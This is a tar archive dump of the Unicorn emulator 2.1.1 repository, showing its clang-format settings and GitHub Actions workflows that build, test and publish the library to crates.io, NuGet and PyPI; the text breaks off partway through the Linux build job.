pax_global_header00006660000000000000000000000064146752410670014526gustar00rootroot0000000000000052 comment=d568885d64c89db5b9a722f0c1bef05aa92f84ca unicorn-2.1.1/000077500000000000000000000000001467524106700132045ustar00rootroot00000000000000unicorn-2.1.1/.clang-format000066400000000000000000000007141467524106700155610ustar00rootroot00000000000000BasedOnStyle: LLVM IndentWidth: 4 UseTab: Never BreakBeforeBraces: Linux AllowShortIfStatementsOnASingleLine: Never AllowShortCaseLabelsOnASingleLine: false AllowShortBlocksOnASingleLine: Empty AllowShortFunctionsOnASingleLine: Empty AllowShortLoopsOnASingleLine: false IndentCaseLabels: false ColumnLimit: 80 SortIncludes: false AllowShortLambdasOnASingleLine: Inline AlwaysBreakBeforeMultilineStrings: false BreakStringLiterals: true PointerAlignment: Right unicorn-2.1.1/.github/000077500000000000000000000000001467524106700145445ustar00rootroot00000000000000unicorn-2.1.1/.github/workflows/000077500000000000000000000000001467524106700166015ustar00rootroot00000000000000unicorn-2.1.1/.github/workflows/Crate-publishing.yml000066400000000000000000000036111467524106700225250ustar00rootroot00000000000000name: Crate 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: env: UNICORN_VERSION: dev jobs: build: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, name: 'Windows x86_64' } - { os: windows-2019, arch: x86, name: 'Windows x86' } - { os: ubuntu-latest, arch: x64, name: 'Ubuntu x86_64' } - { os: macos-latest, arch: x64, name: 'macOS x86_64' } steps: - uses: actions/checkout@v4 - name: '🛠️ Set up Rust' uses: dtolnay/rust-toolchain@stable - name: '🛠️ Activate Developer Command Prompt' if: contains(matrix.config.os, 'win') uses: ilammy/msvc-dev-cmd@v1 with: arch: ${{ matrix.config.arch }} - name: '🛠️ Win build dependencies' if: contains(matrix.config.os, 'win') shell: bash run: | choco install ninja cmake - name: '🛠️ macOS build dependencies' if: contains(matrix.config.os, 'macOS') shell: bash run: | brew install ninja - name: '🚧 Cargo test' if: "!startsWith(github.ref, 'refs/tags')" run: | cargo test - name: '📦 Cargo Publish' if: startsWith(github.ref, 'refs/tags') && contains(matrix.config.os, 'ubuntu') env: TOKEN: ${{ secrets.cratesio_token }} UNICORN_VERSION: dev run: | cargo login $TOKEN && cargo test && cargo publishunicorn-2.1.1/.github/workflows/Nuget-publishing.yml000066400000000000000000000355751467524106700225670ustar00rootroot00000000000000name: Nuget 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" branches: - dev - master permissions: packages: write jobs: Windows: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: true matrix: config: - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit shared', msvc-arch: x64, artifact: 'windows_msvc64_shared.7z', shared: 'yes', build_type: 'Release', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit shared', msvc-arch: x86, artifact: 'windows_msvc32_shared.7z', shared: 'yes', build_type: 'Release', archiver: '7z a', generators: 'Visual Studio 16 2019' } compiler: [ gcc ] steps: - uses: 
actions/checkout@v4 - name: '🛠️ Win MSVC 64 setup' if: contains(matrix.config.name, 'MSVC 64') uses: microsoft/setup-msbuild@v2 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'MSVC 64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🚧 Win MSVC 64 build' if: contains(matrix.config.name, 'MSVC 64') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_C_FLAGS="//MT" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Release instdir - name: '🛠️ Win MSVC 32 setup' if: contains(matrix.config.name, 'MSVC 32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🚧 Win MSVC 32 build' if: contains(matrix.config.name, 'MSVC 32') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -A "win32" \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_C_FLAGS="//MT" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Release instdir - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Macos: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: true matrix: config: - { os: macos-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake shared', shared: 'yes', artifact: 'macos-cmake-shared-x64.7z', build_type: 'Release', archiver: '7za a', generators: 'Ninja' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🚧 Mac build' if: contains(matrix.config.name, 'macos-x64') shell: bash run: | brew install ninja ninja --version cmake --version mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . 
../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Linux: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x64.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x86.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: aarch64, python-arch: aarch64, python-ver: '3.8', name: 'ubuntu-aarch64 cmake', artifact: 'ubuntu-cmake-aarch64.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } - { os: ubuntu-latest, arch: ppc64le, python-arch: ppc, python-ver: '3.8', name: 'ubuntu-ppc64le cmake', artifact: 'ubuntu-cmake-ppc64le.7z', build_type: 'Release', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🚧 Linux x64/x86 build' if: contains(matrix.config.arch, 'x64') || contains(matrix.config.arch, 'x86') shell: 'script -q -e -c "bash {0}"' run: | if [ ${{ matrix.config.arch }} == 'x64' ]; then sudo apt install -q -y libcmocka-dev ninja-build else export CFLAGS="-m32" LDFLAGS="-m32" LDFLAGS_STATIC="-m32" UNICORN_QEMU_FLAGS="--cpu=i386" sudo dpkg --add-architecture i386 sudo apt update sudo apt install -q -y lib32ncurses-dev lib32z1-dev lib32gcc-9-dev libc6-dev-i386 gcc-multilib \ libcmocka-dev:i386 libcmocka0:i386 libc6:i386 libgcc-s1:i386 ninja-build fi mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '🚧 Linux ppc64le/aarch64 build' if: contains(matrix.config.arch, 'ppc64le') || contains(matrix.config.arch, 'aarch64') uses: uraimo/run-on-arch-action@v2 with: arch: ${{ matrix.config.arch }} distro: ${{ matrix.config.distro }} setup: | mkdir -p "${PWD}/instdir" dockerRunArgs: | --volume "${PWD}/instdir:/instdir" shell: /bin/sh install: | apt-get update -q -y apt-get install -q -y git cmake build-essential automake libcmocka-dev pkg-config ${{ matrix.compiler }} ninja-build run: | mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=/instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . 
../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} publish: needs: ["Windows", "Macos", "Linux"] if: ${{ needs.Windows.result == 'success' && needs.Macos.result == 'success' && needs.Linux.result == 'success' }} runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - name: 🛠️ Download artifacts uses: actions/download-artifact@v4 with: path: artifacts - name: 🛠️ Extract artifacts shell: python run: | import subprocess import os artifactPath = os.path.join(os.getcwd(), "artifacts") bindingsPath = os.path.join(os.getcwd(), "bindings", "dotnet", "UnicornEngine") ARTIFACT_CONFIG = { "ubuntu-cmake-aarch64.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-arm64/native", "destFile": "libunicorn.so" }, "ubuntu-cmake-ppc64le.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-ppc64le/native", "destFile": "libunicorn.so" }, "ubuntu-cmake-shared-x86.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.so.*", "destDir": "runtimes/linux-x64/native", "destFile": "libunicorn.so" }, "macos-cmake-shared-x64.7z": { "sourceDir": "lib/", "sourceFile": "libunicorn.*.dylib", "destDir": "runtimes/osx-x64/native", "destFile": "libunicorn.dylib" }, "windows_msvc64_shared.7z": { "sourceDir": "", "sourceFile": "unicorn.dll", "destDir": "runtimes/win-x64/native", "destFile": "unicorn.dll" }, "windows_msvc32_shared.7z": { "sourceDir": "", "sourceFile": "unicorn.dll", "destDir": "runtimes/win-x86/native", "destFile": "unicorn.dll" } } if len(os.listdir(artifactPath)) < len(ARTIFACT_CONFIG.keys()): print("Some artifacts are missing. Aborting.") exit(1) for artifact in os.listdir(artifactPath): if artifact in ARTIFACT_CONFIG.keys(): print("Working on:", artifact) config = ARTIFACT_CONFIG[artifact] destDir = os.path.join(bindingsPath, config["destDir"]) print("Creating dir:", destDir) os.makedirs(destDir, exist_ok=True) print(f"Extracting library from 7z file to: {config['destDir']}/{config['sourceFile']}") result = subprocess.run(["7z", "e", f"-o{destDir}/", os.path.join(artifactPath, artifact), f"{config['sourceDir']}{config['sourceFile']}"]) result.check_returncode() if config["sourceFile"] != config["destFile"]: output = subprocess.run(["ls", destDir], stdout=subprocess.PIPE) sourceFile = output.stdout.decode().strip() print(f"Renaming {sourceFile} to {config['destFile']}") os.rename(os.path.join(destDir, sourceFile), os.path.join(destDir, config["destFile"])) print("Done!") - name: 🛠️ Get short sha id: git_short_sha run: echo "result=$(git rev-parse --short "${{ github.sha }}")" >> $GITHUB_OUTPUT - uses: actions/setup-dotnet@v4 with: dotnet-version: 6.0.x - name: 🛠️ Authenticate to Github Packages working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget add source --username "${{ github.repository_owner }}" --password "${{ secrets.GITHUB_TOKEN }}" --store-password-in-clear-text --name github "https://nuget.pkg.github.com/${{ github.repository_owner }}/index.json" - name: 🛠️ List all native libraries working-directory: bindings/dotnet/UnicornEngine run: find ./runtimes -type f -print - name: 🚧 Package .NET distribution working-directory: bindings/dotnet/UnicornEngine run: | [[ "${{ github.ref_name }}" == "master" ]] \ && dotnet pack -c Release \ || dotnet pack -c Release --version-suffix="${{ steps.git_short_sha.outputs.result }}" - name: '📤 Upload artifact' uses: actions/upload-artifact@v4 with: path: ${{ 
github.workspace }}/bindings/dotnet/UnicornEngine/bin/Release/UnicornEngine.Unicorn.*.nupkg - name: 📦 Publish to Github Packages if: startsWith(github.ref, 'refs/tags') working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget push "bin/Release/UnicornEngine.Unicorn.*.nupkg" --source "github" --api-key "${{ secrets.GHPR_TOKEN }}" - name: 📦 Publish Nuget package if: startsWith(github.ref, 'refs/tags') working-directory: bindings/dotnet/UnicornEngine run: dotnet nuget push "bin/Release/UnicornEngine.Unicorn.*.nupkg" -k "$NUGET_AUTH_TOKEN" -s https://api.nuget.org/v3/index.json env: NUGET_AUTH_TOKEN: ${{ secrets.NUGET_KEY }} unicorn-2.1.1/.github/workflows/PyPI-publishing.yml000066400000000000000000000117741467524106700223210ustar00rootroot00000000000000name: PyPI 📦 Distribution on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: jobs: build: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, python-ver: '3.8', name: 'win_amd64' } - { os: windows-2019, arch: x32, python-ver: '3.8', name: 'win32' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'musllinux' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'manylinux2014_x86_64' } - { os: ubuntu-latest, arch: x32, python-ver: '3.8', name: 'manylinux2014_i686' } - { os: ubuntu-latest, arch: aarch64, python-ver: '3.8', name: 'manylinux2014_aarch64' } - { os: ubuntu-latest, arch: x64, python-ver: '3.8', name: 'sdist' } - { os: macos-12, arch: x86_64, python-ver: '3.8', name: 'macos_x86_64' } - { os: macos-14, arch: arm64, python-ver: '3.10', name: 'macos_arm64' } steps: - uses: actions/checkout@v4 - name: '🛠️ Set up Python' uses: actions/setup-python@v5 with: python-version: ${{ matrix.config.python-ver }} - name: '🛠️ Add msbuild to PATH' if: contains(matrix.config.name, 'win') uses: microsoft/setup-msbuild@v2 with: vs-version: '16.5' - name: '🛠️ Win MSVC 32 dev cmd setup' if: contains(matrix.config.name, 'win32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'win_amd64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🛠️ Win build dependencies' if: contains(matrix.config.name, 'win') shell: bash run: | choco install ninja cmake - name: '🛠️ macOS dependencies' if: contains(matrix.config.name, 'macos') run: | brew install ninja - name: '🛠️ pip dependencies' run: | pip install --upgrade setuptools wheel - name: '🚧 Build distribution' shell: bash run: | if [ ${{ matrix.config.name }} == 'win32' ]; then cd bindings/python && python setup.py build -p win32 sdist bdist_wheel -p win32 rm dist/*.tar.gz elif [ ${{ matrix.config.name }} == 'manylinux2014_i686' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-x86 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh elif [ ${{ matrix.config.name }} == 'manylinux2014_aarch64' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-aarch64 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh --plat-name manylinux2014_aarch64 elif [ ${{ matrix.config.name }} == 'manylinux2014_x86_64' ]; then docker run --rm -v `pwd`/:/work dockcross/manylinux2014-x64 > ./dockcross chmod +x ./dockcross ./dockcross bindings/python/build_wheel.sh elif [ ${{ matrix.config.name }} == 'musllinux' ]; then docker run --rm -v `pwd`:/work -w /work 
python:3.7-alpine sh /work/bindings/python/musl_wheel.sh elif [ ${{ matrix.config.name }} == 'sdist' ]; then cd bindings/python && python setup.py sdist elif [ ${{ matrix.config.name }} == 'macos_arm64' ]; then cd bindings/python && _PYTHON_HOST_PLATFORM="macosx-11.0-arm64" ARCHFLAGS="-arch arm64" python setup.py bdist_wheel else cd bindings/python && python setup.py bdist_wheel fi - name: '📤 Upload artifact' uses: actions/upload-artifact@v4 with: name: ${{ matrix.config.name }} path: ${{ github.workspace }}/bindings/python/dist/* publish: needs: [build] runs-on: ubuntu-latest if: startsWith(github.ref, 'refs/tags') steps: - uses: actions/download-artifact@v4 with: merge-multiple: true path: dist - name: '📦 Publish distribution to PyPI' uses: pypa/gh-action-pypi-publish@release/v1 with: user: __token__ password: ${{ secrets.pypi_pass }} unicorn-2.1.1/.github/workflows/build-uc2.yml000066400000000000000000000445471467524106700211300ustar00rootroot00000000000000name: Build UC2 on: push: paths-ignore: - ".gitignore" - "docs/**" - "README" - "CREDITS.TXT" - "COPYING_GLIB" - "COPYING.LGPL2" - "AUTHORS.TXT" - "CHANGELOG" - "COPYING" pull_request: env: CI: true jobs: Windows: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} strategy: fail-fast: false matrix: config: - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MINGW64 shared', shared: 'yes', mingw: MINGW64, mingw-arch: x86_64, artifact: 'windows_mingw64-shared.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MINGW64 static', shared: 'no', mingw: MINGW64, mingw-arch: x86_64, artifact: 'windows_mingw64-static.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } # - { # This fails randomly which can't be reproduced. # os: windows-2019, # arch: x64, # python-arch: x64, # python-ver: '3.8', # name: 'windows-x64 MINGW32 shared', # shared: "yes", # mingw: MINGW32, # mingw-arch: i686, # artifact: 'windows_mingw32.7z', # build_type: 'Debug', # archiver: '7z a', # generators: 'Ninja' # } # - { # This fails randomly which can't be reproduced. 
# os: windows-2019, # arch: x64, # python-arch: x64, # python-ver: '3.8', # name: 'windows-x64 MINGW32 static', # shared: "no", # mingw: MINGW32, # mingw-arch: i686, # artifact: 'windows_mingw32.7z', # build_type: 'Debug', # archiver: '7z a', # generators: 'Ninja' # } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit shared', msvc-arch: x64, artifact: 'windows_msvc64_shared.7z', shared: 'yes', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit shared', msvc-arch: x86, artifact: 'windows_msvc32_shared.7z', shared: 'yes', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x64, python-arch: x64, python-ver: '3.8', name: 'windows-x64 MSVC 64bit static', msvc-arch: x64, artifact: 'windows_msvc64_static.7z', shared: 'no', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } - { os: windows-2019, arch: x86, python-arch: x86, python-ver: '3.8', name: 'windows-x86 MSVC 32bit static', msvc-arch: x86, artifact: 'windows_msvc32_static.7z', shared: 'no', build_type: 'Debug', archiver: '7z a', generators: 'Visual Studio 16 2019' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 - name: '🛠️ Win MINGW setup' if: contains(matrix.config.mingw, 'MINGW') uses: msys2/setup-msys2@v2 with: msystem: ${{ matrix.config.mingw }} install: >- git mingw-w64-${{ matrix.config.mingw-arch }}-cmake mingw-w64-${{ matrix.config.mingw-arch }}-ninja mingw-w64-${{ matrix.config.mingw-arch }}-cmocka mingw-w64-${{ matrix.config.mingw-arch }}-${{ matrix.compiler }} mingw-w64-${{ matrix.config.mingw-arch }}-toolchain - name: '🛠️ Win MSVC 64 setup' if: contains(matrix.config.name, 'MSVC 64') uses: microsoft/setup-msbuild@v2 - name: '🛠️ Win MSVC 64 dev cmd setup' if: contains(matrix.config.name, 'MSVC 64') uses: ilammy/msvc-dev-cmd@v1 with: arch: x64 - name: '🚧 Win MSVC 64 build' if: contains(matrix.config.name, 'MSVC 64') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Debug instdir - name: '🛠️ Win MSVC 32 setup' if: contains(matrix.config.name, 'MSVC 32') uses: ilammy/msvc-dev-cmd@v1 with: arch: x86 - name: '🚧 Win MSVC 32 build' if: contains(matrix.config.name, 'MSVC 32') shell: bash run: | choco install ninja cmake ninja --version cmake --version mkdir build cmake \ -S . \ -B . \ -A "win32" \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . 
--strip --config ${{ matrix.config.build_type }} ctest -VV -C ${{ matrix.config.build_type }} mv Debug instdir - name: '🚧 Win MINGW build' if: contains(matrix.config.mingw, 'MINGW') shell: msys2 {0} run: | if [ ${{ matrix.config.mingw }} == 'MINGW32' ]; then export CPPFLAGS=-D__USE_MINGW_ANSI_STDIO=1 #export CC=i686-w64-mingw32-gcc export AR=gcc-ar export RANLIB=gcc-ranlib export CFLAGS="-m32 -static" export LDFLAGS="-m32" export LDFLAGS_STATIC="-m32" export UNICORN_QEMU_FLAGS="--cpu=i386" fi mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DCMAKE_C_FLAGS:STRING="-static" \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Macos: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: macos-12, # x64 arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake shared', shared: 'yes', artifact: 'macos-x64-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-12, arch: x64, python-arch: x64, python-ver: '3.8', name: 'macos-x64 cmake static', shared: 'no', artifact: 'macos-x64-cmake-static-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-14, # arm64 arch: arm64, python-arch: arm64, python-ver: '3.8', name: 'macos-arm64 cmake shared', shared: 'yes', artifact: 'macos-arm64-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-14, arch: arm64, python-arch: arm64, python-ver: '3.8', name: 'macos-arm64 cmake static', shared: 'no', artifact: 'macos-arm64-cmake-static-x64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } - { os: macos-12, arch: x86_64, python-arch: x86_64, python-ver: '3.8', name: 'android cmake', artifact: 'Android-x86_64.7z', build_type: 'Debug', archiver: '7za a', generators: 'Ninja' } compiler: [ gcc ] steps: - uses: actions/checkout@v4 # - name: '🛠️ Python setup' # uses: actions/setup-python@v5 # with: # python-version: ${{ matrix.config.python-ver }} - name: '🚧 Mac build' if: contains(matrix.config.name, 'macos') shell: bash run: | brew install ninja ninja --version cmake --version mkdir build mkdir instdir cmake \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir \ -DBUILD_SHARED_LIBS=${{ matrix.config.shared }} cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip ctest -VV -C ${{ matrix.config.build_type }} # - name: Setup tmate session # if: ${{ failure() }} # uses: mxschmitt/action-tmate@v3 - name: '🚧 Android x86_64 build' if: contains(matrix.config.name, 'android') shell: bash run: | brew install ninja mkdir build mkdir instdir cmake . 
-DCMAKE_TOOLCHAIN_FILE="$ANDROID_NDK/build/cmake/android.toolchain.cmake" \ -DANDROID_PLATFORM=android-28 \ -DANDROID_NDK="$ANDROID_NDK" \ -DANDROID_ABI=${{ matrix.config.arch }} \ -DOLP_SDK_ENABLE_TESTING=NO \ -DOLP_SDK_BUILD_EXAMPLES=ON \ -S . \ -B . \ -DCMAKE_BUILD_TYPE=${{ matrix.config.build_type }} \ -G "${{ matrix.config.generators }}" \ -DCMAKE_INSTALL_PREFIX:PATH=instdir cmake --build . --config ${{ matrix.config.build_type }} cmake --install . --strip - name: '🚧 AVD Cache' if: contains(matrix.config.name, 'android') uses: actions/cache@v4 id: avd-cache with: path: | ~/.android/avd/* ~/.android/adb* key: avd-28 - name: '🚧 Create x86_64 tests environment' if: contains(matrix.config.name, 'android') && steps.avd-cache.outputs.cache-hit != 'true' uses: reactivecircus/android-emulator-runner@v2 with: api-level: 28 arch: ${{ matrix.config.arch }} force-avd-creation: false disable-animations: false target: default profile: Nexus 6 emulator-options: -no-window -gpu swiftshader_indirect -no-snapshot -noaudio -no-boot-anim -verbose -show-kernel script: echo "Generated AVD snapshot for caching." - name: '🚧 Android x86_64 tests' if: contains(matrix.config.name, 'android') uses: reactivecircus/android-emulator-runner@v2 with: api-level: 28 force-avd-creation: false disable-animations: true arch: ${{ matrix.config.arch }} target: default profile: Nexus 6 emulator-options: -no-window -gpu swiftshader_indirect -no-snapshot -noaudio -no-boot-anim -verbose -show-kernel script: bash ./adb.sh - name: '📦 Pack artifact' if: always() shell: bash working-directory: instdir run: | ls -laR ${{ matrix.config.archiver }} ../${{ matrix.config.artifact }} . ../test* - name: '📤 Upload artifact' if: always() uses: actions/upload-artifact@v4 with: path: ./${{ matrix.config.artifact }} name: ${{ matrix.config.artifact }} Linux: runs-on: ${{ matrix.config.os }} name: ${{ matrix.config.name }} - ${{ matrix.compiler }} strategy: fail-fast: false matrix: config: - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake shared', shared: 'yes', artifact: 'ubuntu-cmake-shared-x86.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x64, python-arch: x64, python-ver: '3.8', name: 'ubuntu-x64 cmake static', shared: 'no', artifact: 'ubuntu-cmake-static-x64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: x86, python-arch: x86, python-ver: '3.8', name: 'ubuntu-x86 cmake static', shared: 'no', artifact: 'ubuntu-cmake-static-x86.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja' } - { os: ubuntu-latest, arch: aarch64, python-arch: aarch64, python-ver: '3.8', name: 'ubuntu-aarch64 cmake', artifact: 'ubuntu-cmake-aarch64.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } - { os: ubuntu-latest, arch: ppc64le, python-arch: ppc, python-ver: '3.8', name: 'ubuntu-ppc64le cmake', artifact: 'ubuntu-cmake-ppc64le.7z', build_type: 'Debug', archiver: '7z a', generators: 'Ninja', distro: ubuntu20.04 } compiler: [ gcc ] steps: - uses: actions/checkout@v4 # - name: '🛠️ Python setup' # uses: actions/setup-python@v5 # with: # python-version: ${{ matrix.config.python-ver }} - name: '🚧 Linux x64/x86 build' if: contains(matrix.config.arch, 'x64') || 
